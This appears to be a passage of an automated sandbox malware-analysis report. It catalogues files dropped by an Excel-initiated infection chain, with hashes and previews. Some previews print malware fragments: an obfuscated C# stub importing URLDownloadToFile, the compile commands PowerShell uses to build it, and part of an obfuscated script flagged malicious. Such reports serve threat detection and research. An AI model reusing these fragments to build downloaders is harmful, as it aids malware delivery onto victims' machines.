                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:U:U
                                                                                                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:1
                                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                              File Type:MSVC .res
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):652
                                                                                                                                                                                              Entropy (8bit):3.071790065694486
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryjak7YnqqPPN5Dlq5J:+RI+ycuZhNRakSPPNnqX
                                                                                                                                                                                              MD5:DDBE6481CA2C7FC5485D1A42E71718FF
                                                                                                                                                                                              SHA1:E3C6926C09371B4A130D39C1787C0EBFE845871C
                                                                                                                                                                                              SHA-256:5244F571956A78034DA5E1EFDD9DC312C3B21A6CD698B0567C93C5DB70CCA201
                                                                                                                                                                                              SHA-512:554BFB2174A2DA0A6FE8125DEABF48EFEE5206F76A9463514091699181E4466CBBC0D2B0DD49E4926B6C60A3291FDF61FC562D9725A90B8BC8406F18E728571E
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...n.n.m.s.w.n.b.n...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...n.n.m.s.w.n.b.n...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (357)
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):475
                                                                                                                                                                                              Entropy (8bit):3.784040633603291
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:6:V/DsYLDS81zuGw0AN//emMmbnlQXReKJ8SRHy4Hy0bgdmY7EKy:V/DTLDfuJ9WrXfHk4Ky
                                                                                                                                                                                              MD5:E0FFA9B6E25C8B8035929F2129E3CE86
                                                                                                                                                                                              SHA1:7714F32DD6779C7772D8B7CB86BD5A0F468C6FC7
                                                                                                                                                                                              SHA-256:3B32677391AD7AA9220E1E1641BEEAD2C7FFF931C572A489386167311DB94F1A
                                                                                                                                                                                              SHA-512:98972D42C91C1D2FB4AD5FE5E29177923019BB79A3B29247D21CE63CC19421591F01C2F063A9F66E18B09E6F571E7082468E531B04ED793147175FBB9BF2ADF8
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:.using System;.using System.Runtime.InteropServices;..namespace DafyFZkqSZ.{. public class yTME. {. [DllImport("UrLMOn.dLl", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr dSyaTRz,string lsxgYL,string cZ,uint weQCMyYq,IntPtr v);.. }..}.
                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):369
                                                                                                                                                                                              Entropy (8bit):5.165490292027158
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23fKCR/Gzxs7+AEszIP23fKCR/V9:p37Lvkmb6KzSQeWZEoSQd9
                                                                                                                                                                                              MD5:801F090BD09B9E035ADDF4E70375EC05
                                                                                                                                                                                              SHA1:9ADD1EC9249B4950B79955C9DB4892FECCF64BF4
                                                                                                                                                                                              SHA-256:C0AEBADEB713A3B691B75E69730CF3911E92A9A5966BAACB50C6711B89FEAEC9
                                                                                                                                                                                              SHA-512:6668157D6B8E3148B63B466D30D8235B892750934405177B74589D1A81F6149293742DF0608753594EAE106853234B2F3AE66F45660EB5A4E688428339942004
                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                              Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\nnmswnbn\nnmswnbn.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\nnmswnbn\nnmswnbn.0.cs"
                                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):3072
                                                                                                                                                                                              Entropy (8bit):2.8110217874969337
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:24:etGSTWPBG5eM7p8mqBk+lTqs45WtkZfgKfpkqhkWI+ycuZhNRakSPPNnq:6T9sM+mACfJrpkEH1ulRa3Nq
                                                                                                                                                                                              MD5:DCC11C35FC0A61FCBAACDB67C1CC641D
                                                                                                                                                                                              SHA1:1FB0E197516925D050A0CB4AF200CA09C203C2A2
                                                                                                                                                                                              SHA-256:07D0461A71DF71B3CFCBAAB6534A168B0337B89D270195A7B0D0DF4909D3C0F0
                                                                                                                                                                                              SHA-512:FCEF0884FDBBFE5AD6EC709FC1E5BE10436FDDA3A6819083B50964F2B10AC5BEAA0C02303EF392BD04ACAC04F3B1E838C30976272A022701884DB2DF52F5775C
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5.g...........!.................#... ...@....... ....................................@.................................X#..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................7.0.....s.....s.......................................... >.....P ......P.........V.....^.....e.....h.....q...P.....P...!.P.....P.......!.....*.......>.......................................'..........<Module>.nn
                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                                                                                                                                              Category:modified
                                                                                                                                                                                              Size (bytes):866
                                                                                                                                                                                              Entropy (8bit):5.307516194282141
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:24:AId3ka6KzSQfEoSQyKaMD5DqBVKVrdFAMBJTH:Akka60fEoyKdDcVKdBJj
                                                                                                                                                                                              MD5:39BA91E2D1DB598171A1C85C3BB4BBFA
                                                                                                                                                                                              SHA1:79CB6416BD784282BE7F75F043C6B3AD026DB81C
                                                                                                                                                                                              SHA-256:853F479EDFFA53EC3116A43F79BC9E785464467617420A9106F5DB6671542E69
                                                                                                                                                                                              SHA-512:05028F73AD610171AC81350567B1FDC9BDD2CC2D773FE1B7947819A361481D9D876F21F24968233F08E84A62D9EA7EBFAE421665987C7C32F4AE9B1455CFD5D1
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\nnmswnbn\nnmswnbn.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\nnmswnbn\nnmswnbn.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                              File Type:MSVC .res
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):652
                                                                                                                                                                                              Entropy (8bit):3.110320494118516
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryunGak7Ynqq1nXPN5Dlq5J:+RI+ycuZhNUnGakS1nXPNnqX
                                                                                                                                                                                              MD5:89B093BB8185B282E7A008000D0AC462
                                                                                                                                                                                              SHA1:F6748F864658F8DDB71D86515A0952B413E1976E
                                                                                                                                                                                              SHA-256:DB288CCBCC69BE9F2ED174DB87059B4805BAFCFEC50007CC90BD63D379E8165E
                                                                                                                                                                                              SHA-512:714477EE67B95146C777021DA0E72BA195FCB41C559DA3E77B5E5045F44AC08F951A77C852184170820D6F6BE36F1D2FD7BC44D331B62587D3BC1FA9245641E6
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...o.p.4.j.5.m.g.w...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...o.p.4.j.5.m.g.w...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (357)
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):475
                                                                                                                                                                                              Entropy (8bit):3.784040633603291
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:6:V/DsYLDS81zuGw0AN//emMmbnlQXReKJ8SRHy4Hy0bgdmY7EKy:V/DTLDfuJ9WrXfHk4Ky
                                                                                                                                                                                              MD5:E0FFA9B6E25C8B8035929F2129E3CE86
                                                                                                                                                                                              SHA1:7714F32DD6779C7772D8B7CB86BD5A0F468C6FC7
                                                                                                                                                                                              SHA-256:3B32677391AD7AA9220E1E1641BEEAD2C7FFF931C572A489386167311DB94F1A
                                                                                                                                                                                              SHA-512:98972D42C91C1D2FB4AD5FE5E29177923019BB79A3B29247D21CE63CC19421591F01C2F063A9F66E18B09E6F571E7082468E531B04ED793147175FBB9BF2ADF8
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:.using System;.using System.Runtime.InteropServices;..namespace DafyFZkqSZ.{. public class yTME. {. [DllImport("UrLMOn.dLl", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr dSyaTRz,string lsxgYL,string cZ,uint weQCMyYq,IntPtr v);.. }..}.
                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):369
                                                                                                                                                                                              Entropy (8bit):5.259222990548986
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23fSPQrRNUzxs7+AEszIP23fSPQrR3n:p37Lvkmb6KzKPQcWZEoKPQ5n
                                                                                                                                                                                              MD5:F273B2904D30768436B8AF7C5A426335
                                                                                                                                                                                              SHA1:AD29C460AEF2B85B36CDB9D75D35F3A23DD3D1DF
                                                                                                                                                                                              SHA-256:9148CA9E1AEB9455E8F5EFED748237E6320D0970D1E9DFF5B6A2CC35FE80EDE4
                                                                                                                                                                                              SHA-512:49E40D83BBF90C8F6E773F5B67CDD23AA968DF68138359637B554461ECB71074868C48D197FFB9B7508C1888A99F399A0EEDA5B5B7ABFBC973CF890E1AE516EA
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\op4j5mgw\op4j5mgw.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\op4j5mgw\op4j5mgw.0.cs"
                                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):3072
                                                                                                                                                                                              Entropy (8bit):2.8271874752596133
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:24:etGSOWPBG5eM7p8mqBk+lTR45WtkZfgmlzqhkWI+ycuZhNUnGakS1nXPNnq:6O9sM+mAifJHlzEH1ulTa3Pq
                                                                                                                                                                                              MD5:616A3131D19A3A762BE129B52EC6464F
                                                                                                                                                                                              SHA1:A29188EC744C89EB0EEA9AAE94A9CACF5359296A
                                                                                                                                                                                              SHA-256:0ED89120E1CCAADFD0A37835A4A097256E787F3E224EBA4A2341D55047AE91E6
                                                                                                                                                                                              SHA-512:CEC140FDFBEFF9A089AF4711F4D4B4C851456D44CBB916CD3E00D4914F84581F455E603B2CD036AE9BD5B8F8466DC0B1600FF017B6B9BC270AD1EE1C075A626F
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5.g...........!.................#... ...@....... ....................................@.................................X#..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................7.0.....s.....s.......................................... >.....P ......P.........V.....^.....e.....h.....q...P.....P...!.P.....P.......!.....*.......>.......................................'..........<Module>.op
                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                                                                                                                                              Category:modified
                                                                                                                                                                                              Size (bytes):866
                                                                                                                                                                                              Entropy (8bit):5.344327196057448
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:24:AId3ka6KzrEovuKaMD5DqBVKVrdFAMBJTH:Akka60rEoWKdDcVKdBJj
                                                                                                                                                                                              MD5:42AB454C1CA4B29D9F293FFC893AACAA
                                                                                                                                                                                              SHA1:07649DC98E2FCF5288E61796019F7052A2511788
                                                                                                                                                                                              SHA-256:AAD4EEFDA8BD7099C96B697DAA858FBDF3593B4EA488A26F3AFFD832D69EC320
                                                                                                                                                                                              SHA-512:158CA44BD34B06294DBBB3DA26D1058BB321671272CE11ED13BD654664DCACC53025F5E25B3388D7B61E5CDFB9E17E3D198D890F8F77570E6888703AC2B9C01D
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\op4j5mgw\op4j5mgw.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\op4j5mgw\op4j5mgw.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1
                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:U:U
                                                                                                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:1
                                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:Qn:Qn
                                                                                                                                                                                              MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                                              SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                                              SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                                              SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:..
                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1
                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:U:U
                                                                                                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:1
                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1
                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:U:U
                                                                                                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:1
                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                              File Type:data
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):512
                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3::
                                                                                                                                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                              File Type:data
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):512
                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3::
                                                                                                                                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                              File Type:data
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):512
                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3::
                                                                                                                                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):194154
                                                                                                                                                                                              Entropy (8bit):3.731653844214341
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3072:+OdS5JRjVEw5UaYEJgt5pQGw4KqDsr/3TMno4z5Bi2nvqcNNb8YR3fh:IJRj6Gi0/oo41k2vqcNNb7hfh
                                                                                                                                                                                              MD5:CB62D268830733F07D331B13FEC20EEA
                                                                                                                                                                                              SHA1:8973DF390628EB1FE3F9EEDB4C13BB2E43397F6C
                                                                                                                                                                                              SHA-256:C5BA540355ACE8916716B6EDB0C403766B53A25EF0DF4E5175C192148E620EAD
                                                                                                                                                                                              SHA-512:28A401CFF8046FBFDDF7F8A11ABC7A00BA8E16468EE76D95B509D0D6201E895F785B5C6F9BA4957C17834B70459DA127ABEB57F0715BAF1C198B626CC2942D1A
                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                              Preview:..p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .d.i.l.i.g.e.n.c.i.a.d.o.r.(.p.a.n.g.u.e.i.r.a.,. .p.a.i.v.o.,. .d.i.s.n.e.r.v.a.d.o.,. .i.n.s.a.t.u.r.a.v.e.l.m.e.n.t.e.,. .g.u.a.r.d.e.a.r.)..... . . . .d.i.m. .f.i.l.t.e.r..... . . . .d.i.m. .d.i.a.l.e.c.t..... . . . .d.i.m. .e..... . . . .d.i.m. .r.e.s..... . . . .d.i.m. .f.o.r.m.a.t.t.e.d.T.e.x.t..... . . . .d.i.m. .f.l.a.g.s..... . . . ..... . . . .f.l.a.g.s. .=. .0..... . . . . ..... . . . .i.f. .d.i.s.n.e.r.v.a.d.o...A.r.g.u.m.e.n.t.E.x.i.s.t.s.(.N.P.A.R.A._.F.I.L.T.E.R.). .t.h.e.n..... . . . . . . . .f.i.l.t.e.r. .=. .d.i.s.n.e.r.v.a.d.o...A.r.g.u.m.e.n.t.(.N.P.A.R.A._.F.I.L.T.E.R.)..... . . . . . . . .d.i.a.l.e.c.t. .=. .U.R.I._.W.Q.L._.D.I.A.L.E.C.T..... . . . .e.n.d. .i.f..... . . . ..... . . . .i.f. .d.i.s.n.e.r.v.a.d.o...A.r.g.u.m.e.n.t.E.x.i.s.t.s.(.N.P.A.R.A._.D.I.A.L.E.C.T.). .t.h.e.n..... . . . . . . . .d.i.a.l.e.c.t. .=. .d.i.s.n.e.r.v.a.d.o...A.r.g.u.m.e.n.t.(.N.P.A.R.A._.D.I.A.L.E.C.T.)..... . . . .e.n.d. .i.f..... . . . ..... . .
                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Oct 8 14:37:28 2024, Security: 1
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1085440
                                                                                                                                                                                              Entropy (8bit):7.284827444451782
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:12288:dmzHJEHAfwu4hjD3DERnLRmF8DN9rf1I3dWuuvgYmYMyHyj6VOjhDR97jkDyw3WN:kLw/hjbARM8jS3RYUBj6oJ7jkDxWA6
                                                                                                                                                                                              MD5:19F1D1530F0D964BD40272DB37D7A128
                                                                                                                                                                                              SHA1:3A754A27C5A0862D7DB343455113A379046B41ED
                                                                                                                                                                                              SHA-256:DD8FC6CB95E946C0A1F4754F704FAA43CC15E7651DA8D544420C6E576C43EDA1
                                                                                                                                                                                              SHA-512:F6CFD9EC983F0A874565DA99A7D15E16061A29F1C1E2D429C16B6040056E49450892446D106B849A20FBF2E7493AF05633E5B165F0DD2C169905820763614B27
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:......................>...............................................................................;.......................h.......j................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):26
                                                                                                                                                                                              Entropy (8bit):3.95006375643621
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
